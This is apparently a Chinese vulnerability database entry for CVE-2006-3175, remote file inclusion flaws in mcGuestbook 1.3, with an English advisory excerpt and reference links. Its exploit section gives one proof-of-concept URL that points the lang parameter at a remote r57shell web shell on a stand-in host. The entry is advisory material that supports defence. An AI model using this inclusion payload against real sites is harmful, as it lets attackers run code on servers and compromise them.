MCGuestbook 多个远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110466 漏洞类型 代码注入
发布时间 2006-06-16 更新时间 2008-06-26
CVE编号 CVE-2006-3175 CNNVD-ID CNNVD-200606-461
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/28037
https://www.securityfocus.com/bid/18476
https://cxsecurity.com/issue/WLB-2006060130
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200606-461
|漏洞详情
mcGuestbook1.3存在多个PHP远程文件包含漏洞。远程攻击者可以借助对(1)admin.php,(2)ecrire.php和(3)lire.php的lang参数当中的URL,执行任意PHP代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/18476/info
  
mcGuestbook is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input.
  
An attacker can exploit these issues to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
  
http://www.example.com/path/lire.php?lang=http://www.example2.com/r57shell.txt?
|受影响的产品
mcGuestbook mcGuestbook 1.3
|参考资料

来源:XF
名称:mcguestbook-multiple-file-include(27114)
链接:http://xforce.iss.net/xforce/xfdb/27114
来源:BID
名称:18476
链接:http://www.securityfocus.com/bid/18476
来源:BUGTRAQ
名称:20060616fileincludeexploitsinmcGuestbook1.3
链接:http://www.securityfocus.com/archive/1/archive/1/437448/100/0/threaded
来源:BUGTRAQ
名称:20060613fileincludeexploitsinmcGuestbook1.3
链接:http://www.securityfocus.com/archive/1/archive/1/437028/100/200/threaded
来源:OSVDB
名称:27462
链接:http://www.osvdb.org/27462
来源:OSVDB
名称:27461
链接:http://www.osvdb.org/27461
来源:OSVDB
名称:27460
链接:http://www.osvdb.org/27460
来源:SREASON
名称:1125
链接:http://securityreason.com/securityalert/1125